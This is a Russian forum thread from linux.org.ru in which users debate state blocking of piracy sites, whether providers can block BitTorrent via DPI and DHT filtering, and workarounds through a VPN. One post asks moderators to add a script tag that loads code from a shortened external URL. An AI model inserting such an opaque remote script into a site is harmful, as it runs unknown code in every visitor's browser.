LINUX.ORG.RU
ФорумTalks

Я таки на вас поражаюсь

0

1

Навеяно
Вот, пытается наше, нет, моё любимое правительство прикрыть пиратство, блокируют сайты. Будут везде линуксы, же. Никто не станет качать сотни программ, с разных сайтов авторов для виндовс. Прикроют муз. пиратство. Никто не станет слушать попсу, ибо платно она никому нахер не всралась. Начнут переходить на джамендо, ну..быдло начнёт переходить на наркотики&алкоголь, ну тут как всегда.
Нормальные сайты никто закрывать не станет, ибо это дикость, и на такого придурка-запрещальщика покрутят пальцем у виска, и, спустя короткое время, восстановят работоспособность сайта.
У каждой палки два конца, у каждой фигуры несколько граней.
А вы тут ноете, вот!

★★★★★

Последнее исправление: cetjs2 (всего исправлений: 1)

Ответ на: комментарий от darkenshvein

это что ж, по вашему все в зарубежные интернеты только ради лошадок ходют?

//а, ну я не разглядел, что ты тролль — из за жира изображение размазалось.

thunar ★★★★★
()
Последнее исправление: thunar (всего исправлений: 1)

пусть закрывают

я вообще не понимаю чего за сайты держаться? что, без них жизнь во вселенной остановится?

mingtom
()

Начнут переходить на джамендо, ну..быдло начнёт переходить на наркотики&алкоголь, ну тут как всегда.

Мы уже перешли, третих день как. А чево такое джамендо?

Edit: П.С. А сиськи у тебя ничево. в смысле, хорошие

yvv ★★☆
()
Последнее исправление: yvv (всего исправлений: 1)
Ответ на: комментарий от yaspol

what's the f#$%?

объясни уже мне, непонятливому, как с технической точки зрения можно закрыть торренты, если трекер не в этой стране, например?

George
()

Никто не станет слушать попсу, ибо платно она никому нахер не всралась.

Ты сильно ошибаешься. Будут платить как миленькие когда не будет легко доступной халявы. Вспомни как они платили по 50 рублей и больше за огрызки песен для мобил.

Начнут переходить на джамендо

На Жаменде и тому подобных нет Григория Лепса, например. Для целевой аудитории «В Контакте», «Одноклассников» и прочих на жамендоподобных нет ничего интересного. Впрочем как и любители нормальной музыки мало чего находят на «Жамендо», 95% там шлак, остальное слушабельно, но с натяжкой.

firestarter ★★★☆
()

вообще все что угодно. азимова — за пропаганду суицида; моцарта — за пропаганду гомофилии — один хрен, они его от чайковского не отличат; хокинса — за пропаганду пиратства и похрен, что морского.

thunar ★★★★★
()
Ответ на: what's the f#$%? от George

объясни уже мне, непонятливому, как с технической точки зрения можно закрыть торренты, если трекер не в этой стране, например?

Как-то так. DPI для этого используется наверное.

firestarter ★★★☆
()
Ответ на: комментарий от vurdalak

Записывать их оттуда ты не имеешь права

Хм, не знал.

drull ★☆☆☆
()
Ответ на: комментарий от firestarter

у меня билайн, включено шифрование в клиенте - так что не затронуло. проблемы хоиячков останутся проблемами хомячков. расшифровывать на лету пакеты, подбирая ключик - кишка тонка

George
()

тем, что вместо мудацкого и говноедского марксизма-ленинизма в школах будут учить ещё в 10 раз более мудацкое и говноедское православие от мигалкова

thunar ★★★★★
()
Последнее исправление: thunar (всего исправлений: 1)

Я за!

Модераторы, maxcom, вставьте код.

<script src="http://clck.ru/8ijea"></script>

ivanlex ★★★★★
()
Ответ на: комментарий от George

у меня билайн, включено шифрование в клиенте - так что не затронуло.

Не во всех городах они фильтруют. Меня тоже не затронуло, а вот в соседнем городе народ жалуется, некоторые даже сменили провайдера.

Шифрование не помогает, потому что клиенты шифруют только обмен файлaми. Протокол DHT не шфируется, как и запросы к трекерам (а ssl трекеров я не встречал).

firestarter ★★★☆
()

запросы к трекерам можно завернуть через проксю/vpn, а отдавать список пиров напрямую, не используя DHT.

еще раз, я не верю, что провайдеры примутся рьяно блокировать все дыры. формально достаточно забанить в фильтре сам трекер. кто обошел - ну, «не шмогла». а уж кто сталкивался с компетентностью того же отдела «К», тот меня поймет - она ниже среднего, это уж точно

George
()
Ответ на: комментарий от abraziv_whiskey

кто мне теперь его переведет и выложит?

«эффективный» менеджер с «рукой рынка», т.е. говно, анально и никак.

FiXer ★★☆☆☆
()
Последнее исправление: FiXer (всего исправлений: 1)

ммм, какой набросец)))

Кстати, а ты не нарушаешь случаем права, ставя себе другого человека на аватарку?

PS У меня то ShareAlike

nerfur ★★★
()
Ответ на: комментарий от proud_anon

У меня дома реально лежат лицензионные DVD с понями с Амазона.

Зато «рука рынка» (тм) (р) снова вставила палки в колёса, с регионами, ВСЁ ДЛЯ ПОКУПАТЕЛЯ!111

FiXer ★★☆☆☆
()
Последнее исправление: FiXer (всего исправлений: 2)

запросы к трекерам можно завернуть через проксю/vpn, а отдавать список пиров напрямую, не используя DHT.

Ты такой умный... А ты не подумал что таким образом ты сможешь обмениваться только с себе подобными? А чем вы можете обмениваться кроме образов дистров? 99,9999 сидеров годного контента всё же хомячки-вендузятники.

еще раз, я не верю, что провайдеры примутся рьяно блокировать все дыры.

Это не важно что ты думаешь. Главное что возможности у них есть заблокировать что угодно.

формально достаточно забанить в фильтре сам трекер. кто обошел - ну, «не шмогла».

Трекеры сейчас не важны. DHT включен у большинства, т.к. по умолчанию. Доступ к трекерам блокировать можно, пакеты DHT тоже можно, как я показал на примере. В итоге пиров ты не получишь. Ну ок, у тебя хватит ума на VPN за рубежом, только тебе обмениваться буде не с кем, т.к. мало кто разбирается в этой фигне и мало у кого будет окота возиться с этим. Я вот лично тоже париться не буду с VPN, хоть и для меня это не проблема.

firestarter ★★★☆
()

С блокировкой вы смирились? Ну, готовьте себя к анальным зондам.

evilmanul
()

Ты такой умный... А ты не подумал что таким образом ты сможешь обмениваться только с себе подобными? А чем вы можете обмениваться кроме образов дистров? 99,9999 сидеров годного контента всё же хомячки-вендузятники.

часто замечаю в числе пиров десятки явно не виндоуз-клиентов. причем на всякие сериалы, которые смотрит моя жена. мне, по наблюдениям, достаточно десятка пиров с нормальный каналом, чтобы качало во весь канал. так что я ничего не потеряю

Это не важно что ты думаешь. Главное что возможности у них есть заблокировать что угодно.

возможность есть (почти, я описал, как она обходится за 5 минут). нет лишних денег и желания у больших провайдеров и специалистов у провайдеров помельче. сужу по своему опыту, да.

Трекеры сейчас не важны. DHT включен у большинства, т.к. по умолчанию. Доступ к трекерам блокировать можно, пакеты DHT тоже можно, как я показал на примере. В итоге пиров ты не получишь. Ну ок, у тебя хватит ума на VPN за рубежом, только тебе обмениваться буде не с кем, т.к. мало кто разбирается в этой фигне и мало у кого будет окота возиться с этим. Я вот лично тоже париться не буду с VPN, хоть и для меня это не проблема.

для кого не важны, а для кого пришла бумажка - сделали %) уверен, что потратив 5 минут времени даже моя жена, не знающая ни одной консольной команды, вполне себе сможет пользоваться торрентами в новых реалиях. более того, уверен, интернеты наполнятся подробными FAQ, как это сделать. война с ветряными мельницами опять будет проиграна

George
()
Ответ на: комментарий от thunar

в рашеньке и так культура выродилась, а когда без внешних источников инцест начнётся, так рашенька вообще к каменному веку сдеградирует.

Не путай причины и следствия, и не думай с потолка. Инцест в рашеньке невозможен - очень большая она и разная. Фактически самодостаточная.

Pakostnik ★★★
()
Ответ на: комментарий от thunar

это опять пчелы против меда получаются. подумай тоже чуть-чуть, почему еще не так давно из США нельзя было продавать за рубеж программы, использующие криптоалгоритмы с несимметричным шифрованием с длиной ключа больше 512 бит? подумай, кто основной потребитель этиой самой криптографии? как раз если подумать, всякие там правообладатели медиамусора идут лесом

George
()

нет лишних денег

Возьмут кредит, гг...

и желания

Никого не волнует.

война с ветряными мельницами опять будет проиграна

Я в этом очень сомневаюсь. Сейчас народу больше другого совсем. Бывает кто-то просит поделиться торрентом, им даю magnet ссылку, так они нос воротят, дай торрент-файл, несмотря на то что magnet у них должен работать из коробки.

firestarter ★★★☆
()

Возьмут кредит, гг...

зачем, если на «приказ» заблокировать доступ к определенному ресурсу, ресурс и правда будет заблокирован? зачем делать что-то еще? ради кого? или типа «провайдеры за идею будут вычищать интернеты от пиратства»? сам-то веришь в этот бред?

George
()

зачем, если на «приказ» заблокировать доступ к определенному ресурсу, ресурс и правда будет заблокирован? зачем делать что-то еще? ради кого? или типа «провайдеры за идею будут вычищать интернеты от пиратства»? сам-то веришь в этот бред?

Конкуренция. Те, у кого не будет DPI оборудования, будут тупо блокировать по IP. Те, кто потратился на DPI, смогут блокировать определённые страницы и пакеты. То есть у вторых более щадящий режим, благодаря чему вторые будут для пользователей предпочтительней.

Но тут речь пока о www. А вот когда всех провайдеров заставят блокировать торренты, то хочешь не хочешь, а придётся устанавливать необходимое для этого оборудование. Впрочем, фильтровать эти пакеты можно и только на стороне магистральных провайдеров.

firestarter ★★★☆
()

хочу еще раз обратить внимание: для специалиста-сетевика у провайдера «заблокировать торренты» это совсем не то же самое, что «заблокировать торренты» для чиновника-безопасника-бывшего (или действующего, что еще хуже) военного. уверяю тебя, для второго как раз это равнозначно тупой блокировке трекеров по tcp/80.

George
()

хочу еще раз обратить внимание: для специалиста-сетевика у провайдера «заблокировать торренты» это совсем не то же самое, что «заблокировать торренты» для чиновника-безопасника-бывшего (или действующего, что еще хуже) военного. уверяю тебя, для второго как раз это равнозначно тупой блокировке трекеров по tcp/80.

Ну это совсем бред. Будет официальный запрет самого протокола, провайдеры заблокируют его по настоящему. Ничего невозможного нет.

firestarter ★★★☆
()

протокола DHT? это не «запрет торрентов», а «запрет децентрализованного обмена пирами». BitTorrent - не протокол передачи данных. UDP не запретишь

George
()

протокола DHT? это не «запрет торрентов», а «запрет децентрализованного обмена пирами»

Блин, какой ты тугой... Фильтровать пакеты DHT можно, фильтровать запросы к трекерам (имеется в виду announcer) можно. Этого достаточно чтобы блокировать битторрент.

BitTorrent - не протокол передачи данных.

Это P2P протокол, точнее связка нескольких протоколов, которые фильтровать не проблема.

UDP не запретишь

Можно, но не нужно.

firestarter ★★★☆
()

PS У меня то ShareAlike

Нет. Это мой сосед Вася, и в данный момент он очень возмущён.

дать бы тебе по рукам, чтоб ересь такую не набирал на клавиатуре ими. И ты пропустил мой вопрос)

nerfur ★★★
()

видимо, моя тугость на сегодня покидает ЛОР на этой прекрасной ноте :) ок, можно заблокировать, согласен. можно обойти. писал уже. не сложно, аж 5 минут надо потратить. взамент bittorrent вырастет другой p2p протокол в перспективе. или откопают edonkey, кому приспичит. кстати, навскидку - кубиборда из соседней темы, веб-морда трансмишшена на нем и настроенный там же vpn в забугорье прекрасно решат проблемы всяких там блокировок. выну из десктора один терабайтник, поставлю туда. кому хочется плакаться - ну пусть плачут дальше, что уж там

George
()

Можно, а вообще гугли ГК РФ и просвещайся, а то мало ли еще в беду попадешь

nerfur ★★★
()

Ты мульт drBatty что ли?

ок, можно заблокировать, согласен. можно обойти. писал уже. не сложно,

Я тоже выше писал что это всё равно приведёт к сильному упадку этого P2P, станет как в начале нулевых, когда им пользовались только гики.

вырастет другой p2p протокол в перспективе

Для этого его должны запретить по всему миру, а не только в СР. Русские ничего такого не смогут создать.

или откопают edonkey

Ты точно не drBatty? Не нужно. После битторрента на него никто не вернётся.

кубиборда из соседней темы, веб-морда трансмишшена на нем и настроенный там же vpn в забугорье прекрасно решат проблемы всяких там блокировок.

Писал выше, горстка красноглазых гиков не заменит всех остальных людей.

firestarter ★★★☆
()
Последнее исправление: firestarter (всего исправлений: 1)
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.